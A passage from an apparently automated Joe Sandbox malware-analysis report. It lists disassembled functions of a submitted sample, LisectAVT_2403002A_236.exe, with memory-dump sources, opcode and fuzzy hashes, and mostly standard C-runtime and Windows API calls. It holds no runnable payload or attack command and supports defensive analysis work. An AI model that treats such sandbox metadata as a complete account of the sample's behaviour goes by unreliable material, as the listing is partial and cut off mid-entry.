                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55839ba4dec19141064893146752ef209289655974f59ff8aa557d34f12c2bf4
                    • Instruction ID: b2efa9c919af094fc9a799caade377b9941bd34d29b6b83b5d69cbbb8f9b2153
                    • Opcode Fuzzy Hash: 55839ba4dec19141064893146752ef209289655974f59ff8aa557d34f12c2bf4
                    • Instruction Fuzzy Hash: D1F05E31A1A751CBC70ACF19D55063AFBF0AF86741F59586DE485D7380CB30DD058B46
                    Function 003BD1C0 Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2044051f06bb029c9e823812dcc2e061d3b89e47936c5c72b85e7b0847b4fd87
                    • Instruction ID: 1b69459c467c7fa8006c7adde53d2f8120b600ffac10a9693cc471e97f2dc2fe
                    • Opcode Fuzzy Hash: 2044051f06bb029c9e823812dcc2e061d3b89e47936c5c72b85e7b0847b4fd87
                    • Instruction Fuzzy Hash: 3DD0A7616483B90E57994D3D44604B3FBE8E947212F18549EF5D6E3149E230DC0157AD
                    Function 003BFA72 Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbfec440915e90c0d1b823b63d798f982d5df3e420c326224fe04f6fcedd0a9f
                    • Instruction ID: 9500a3a0185f09ac579d42ab2e804b92d0e78f8e9b72581b10f240164f0e9d43
                    • Opcode Fuzzy Hash: fbfec440915e90c0d1b823b63d798f982d5df3e420c326224fe04f6fcedd0a9f
                    • Instruction Fuzzy Hash: CDD01321F740558BC71ECF20DC5057BB3AEA7CE704B15651CC943E7556D710AD154748
                    Function 003CCB43 Relevance: .0, Instructions: 13COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f9a532f81a244a42241e7dcdaad4bdd63221204f0deef8f2c82bfea95ad39f77
                    • Instruction ID: fdf8eebbf36b794ae69b6065a7893941799af6cbe5f29fee32a556930c7dd72e
                    • Opcode Fuzzy Hash: f9a532f81a244a42241e7dcdaad4bdd63221204f0deef8f2c82bfea95ad39f77
                    • Instruction Fuzzy Hash: 22C08C21D400808B8517CF28AC8283273388B07348F102028A953EB291EE40D008C819
                    Function 003BFA7F Relevance: .0, Instructions: 12COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0539b4ff02a10d4f8de8478eea8352a8b2d7107be67f91f23aa197b8eb2023cd
                    • Instruction ID: a80d4aecd6e35a53d3320a59dc3b7a9024c6bf15700c2851e52f9f3551dcdcd3
                    • Opcode Fuzzy Hash: 0539b4ff02a10d4f8de8478eea8352a8b2d7107be67f91f23aa197b8eb2023cd
                    • Instruction Fuzzy Hash: 5EC01234A1828087C34ACB04C880637B6AAAB8A314F106118D9821B3A3C320A8418A08
                    Function 003C19E7 Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4cb4765e15c0a890cea8c1bfe88a18289266489338ce852b0d1e1870b237cfd
                    • Instruction ID: f2c47e0f106ebd8b3d6e3d8f4710cf72d216f661f095508c21218bf7819fe198
                    • Opcode Fuzzy Hash: a4cb4765e15c0a890cea8c1bfe88a18289266489338ce852b0d1e1870b237cfd
                    • Instruction Fuzzy Hash: B8C04C34E540808BC61ACA10ACD1476E26A5356205B14B5259916D7795C724D4028904
                    Function 003E4489 Relevance: .0, Instructions: 10COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a101f335b2a79500814998f7d59b66dfcf27f0ee7b06cafbfd64c7bd076275fd
                    • Instruction ID: ab2667ed08f70c2b6469742b74019f399b309b64be025b7bde9ee7d0146252a4
                    • Opcode Fuzzy Hash: a101f335b2a79500814998f7d59b66dfcf27f0ee7b06cafbfd64c7bd076275fd
                    • Instruction Fuzzy Hash: 98B09278E89000CB864ECF04E851432A37CDB17308F05342BA542E3262C624E402C918
                    Function 0040C6C0 Relevance: 10.8, APIs: 7, Instructions: 259COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 0040C790
                    • _malloc.LIBCMT ref: 0040C7C9
                      • Part of subcall function 0040B4AF: __FF_MSGBANNER.LIBCMT ref: 0040B4D2
                      • Part of subcall function 0040B4AF: __NMSG_WRITE.LIBCMT ref: 0040B4D9
                      • Part of subcall function 0040B4AF: RtlAllocateHeap.NTDLL(00000000,00408610), ref: 0040B526
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0040C7FC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeap_malloc
                    • String ID:
                    • API String ID: 1306061670-0
                    • Opcode ID: 27be81196fea17ce7323f094cd07afb36f5554c874712604baf33f701ca88864
                    • Instruction ID: e2e458ca7501826cdb0bf92aab3a0e92a11d3c92321269e5647477debd8423b4
                    • Opcode Fuzzy Hash: 27be81196fea17ce7323f094cd07afb36f5554c874712604baf33f701ca88864
                    • Instruction Fuzzy Hash: B9816BB290010AEFCF11AFA4CCC18AE7BA5EB48354B14463BF915F72A1D7388D51DB99
                    Function 0040E725 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 0040E74D
                      • Part of subcall function 00409E53: __getptd.LIBCMT ref: 00409E61
                      • Part of subcall function 00409E53: __getptd.LIBCMT ref: 00409E6F
                    • __getptd.LIBCMT ref: 0040E757
                      • Part of subcall function 0040AD41: __amsg_exit.LIBCMT ref: 0040AD51
                    • __getptd.LIBCMT ref: 0040E765
                    • __getptd.LIBCMT ref: 0040E773
                    • __getptd.LIBCMT ref: 0040E77E
                    • _CallCatchBlock2.LIBCMT ref: 0040E7A4
                      • Part of subcall function 00409EF8: __CallSettingFrame@12.LIBCMT ref: 00409F44
                      • Part of subcall function 0040E84B: __getptd.LIBCMT ref: 0040E85A
                      • Part of subcall function 0040E84B: __getptd.LIBCMT ref: 0040E868
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
                    • String ID:
                    • API String ID: 3688206559-0
                    • Opcode ID: 2db1bb391b0cf3e78615b93cc03432e8aee0fde639b6d0981bcd4f4d85589992
                    • Instruction ID: 9e3d9be8aa4d7762f27b392a53c1e3190b5a50d19fa785cf08586503a1bc7035
                    • Opcode Fuzzy Hash: 2db1bb391b0cf3e78615b93cc03432e8aee0fde639b6d0981bcd4f4d85589992
                    • Instruction Fuzzy Hash: 0211C9B1C00309DFDF00EFA5C445B9D7BB1FF04315F10856AF814AB291DB389A519B59
                    Function 0040E474 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit
                    • String ID: MOC$csm
                    • API String ID: 1969926928-1389381023
                    • Opcode ID: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                    • Instruction ID: f2957a845660c5c01ee6a7139e6f83219e5b658141119ebe8a50daae15099cb8
                    • Opcode Fuzzy Hash: 33b9cced6b741998e27e7e2c03043b0455c789580758d048f674bb0431158d77
                    • Instruction Fuzzy Hash: C8E01A311102048FC710AA66C446B293795EF84319F1909B6E608EB7E2D73CD8A0964B
                    Function 004138E0 Relevance: 7.8, APIs: 5, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateScopeTableHandlers.LIBCMT ref: 004139E1
                    • __FindPESection.LIBCMT ref: 004139FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FindHandlersScopeSectionTableValidate
                    • String ID:
                    • API String ID: 876702719-0
                    • Opcode ID: 40368339a5ee7204651a229e79edce5622c7892ca2a60eb641cd66243f001322
                    • Instruction ID: 17594baa20bd9b84cf1e19b56051b05d292ec9e19e6e681aac94fbae13eee709
                    • Opcode Fuzzy Hash: 40368339a5ee7204651a229e79edce5622c7892ca2a60eb641cd66243f001322
                    • Instruction Fuzzy Hash: FF9105B2E102049BCB10CF59D9807EE77B5EB84311F15812ED806A7391E779EE82CB98
                    Function 0040FE45 Relevance: 7.7, APIs: 5, Instructions: 156COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,0041002F,00000001,00000000,?), ref: 0040FEEB
                    • _malloc.LIBCMT ref: 0040FF20
                      • Part of subcall function 0040B4AF: __FF_MSGBANNER.LIBCMT ref: 0040B4D2
                      • Part of subcall function 0040B4AF: __NMSG_WRITE.LIBCMT ref: 0040B4D9
                      • Part of subcall function 0040B4AF: RtlAllocateHeap.NTDLL(00000000,00408610), ref: 0040B526
                    • _memset.LIBCMT ref: 0040FF40
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,00000000,00000001,?), ref: 0040FF55
                    • __freea.LIBCMT ref: 0040FF6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeap__freea_malloc_memset
                    • String ID:
                    • API String ID: 4236210087-0
                    • Opcode ID: 1cbd2ed6c972f6d600f90a3c4b820154a1b36a87365092507f6548e562b2f8d0
                    • Instruction ID: 720d9b778a85ef635eb90bffddb7b1909058c68a778e08fe7c94cffdb791b02c
                    • Opcode Fuzzy Hash: 1cbd2ed6c972f6d600f90a3c4b820154a1b36a87365092507f6548e562b2f8d0
                    • Instruction Fuzzy Hash: 08519DB150010AAFCF209F65CC81DAF7BA9EF49394B14443BFA04E76A1D638DD658B98
                    Function 0040DB59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040DB6E
                      • Part of subcall function 0040A737: __setmbcp.LIBCMT ref: 0040A742
                    • _parse_cmdline.LIBCMT ref: 0040DBB0
                    • _parse_cmdline.LIBCMT ref: 0040DBF1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: _parse_cmdline$___initmbctable__setmbcp
                    • String ID: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                    • API String ID: 1290970244-1005951232
                    • Opcode ID: 57fdd6199c5ed093eabd25ec3d2c718706acc0153773c4a7d1078d9d7d2482e5
                    • Instruction ID: df739acf5495bf8cfba19a6b55449a92c8d52d02650ed707a3356a9168abdd8e
                    • Opcode Fuzzy Hash: 57fdd6199c5ed093eabd25ec3d2c718706acc0153773c4a7d1078d9d7d2482e5
                    • Instruction Fuzzy Hash: 9521E7B1D00118BFCB10EFE89D80CDE7B79EA81324B11467AE514F72C0D274AE49C798
                    Function 00411934 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00411968
                    • __isleadbyte_l.LIBCMT ref: 0041199C
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,?), ref: 004119CD
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00411A3B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 39d259128963b934820a2299397a35abfd35c04fc8e2608e2eead82ca5546b21
                    • Instruction ID: fd92cd10ecd178bec906bab7bbfa3e621a2590a86015116751b641ef2a13aa65
                    • Opcode Fuzzy Hash: 39d259128963b934820a2299397a35abfd35c04fc8e2608e2eead82ca5546b21
                    • Instruction Fuzzy Hash: D931D171610296EFCF20DF64C890AEE7FA5EF00311F1485ABE6A59B2A1D335DD80DB58
                    Function 0040AAF5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • TlsGetValue.KERNEL32(0040861F,?,0040B598,?,0040B568,0040861F,?,?,0040861F,?), ref: 0040AB07
                    • TlsGetValue.KERNEL32(00000005,?,0040B598,?,0040B568,0040861F,?,?,0040861F,?), ref: 0040AB1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: Value
                    • String ID: DecodePointer$KERNEL32.DLL
                    • API String ID: 3702945584-629428536
                    • Opcode ID: ebd918356246b68a6b4fce1167d6c157cbc33eb871a14a2f0a63d1a0a9c7e863
                    • Instruction ID: 20c84687a6365f27f61a4355e6884736e347e250e3c39c696c0566f92e00b506
                    • Opcode Fuzzy Hash: ebd918356246b68a6b4fce1167d6c157cbc33eb871a14a2f0a63d1a0a9c7e863
                    • Instruction Fuzzy Hash: D4F0A9345417056ACB105B76DC40DEB3EA9DF403A47184133B918E71E0DB38DC61C69E
                    Function 003CADB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 003CAECE
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 003CAEFD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
